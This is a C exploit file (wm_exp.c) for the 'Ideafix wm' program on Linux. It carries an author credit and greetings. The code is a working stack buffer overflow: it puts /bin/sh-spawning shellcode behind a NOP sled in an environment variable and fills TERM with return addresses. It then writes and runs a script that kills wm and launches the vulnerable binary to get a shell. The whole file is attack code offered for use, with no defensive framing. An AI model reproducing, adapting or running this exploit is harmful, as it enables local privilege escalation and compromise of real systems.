Comments: bisti <bst@iname.com>
Greetz to fidel, larry, rb, rnt, veida.
[--------------------------- wm_exp.c ---------------------------]
/*
* 'Ideafix wm' Exploit 4 Linux.
*/
#include <stdio.h>
#include <stdlib.h>
#define TERMSIZE 2000
#define HUEVOSIZE 5000
char *shell =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
long
esp(void)
{
__asm__("movl %esp,%eax\n");
}
int
main(void)
{
char *ptr, *bof, *egg;
long *addr_ptr, addr;
int i;
if ( !(bof = malloc(TERMSIZE)) ) {
printf("NoMoreMemory4bof.\n");
exit(1);
}
if ( !(egg = malloc(HUEVOSIZE)) ) {
printf("NoMoreMemory4egg.\n");
exit(1);
}
addr = esp();
addr_ptr = (long *) bof;
for (i = 0; i < TERMSIZE; i += 4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
*(ptr++) = 0x90;
for( i = 0; i < strlen(shell); i++)
*(ptr++) = shell[i];
bof[TERMSIZE - 1] = '\0';
egg[HUEVOSIZE - 1] = '\0';
memcpy(bof, "BOF=", 4);
memcpy(egg , "EGG=", 4);
putenv(bof);
putenv(egg);
system("echo '#!/bin/sh' >> doit");
system("echo -n '# We kill any instance of wm, set TERM, ' >> doit");
system("echo 'and run the vulnerable program.' >> doit");
system("echo '# Bisti [111097]' >> doit");
system("echo 'killall wm' >> doit");
system("echo 'TERM=$BOF;export TERM' >> doit");
system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit");
system("sh ./doit");
}
[---------------------------------------------------------------------------]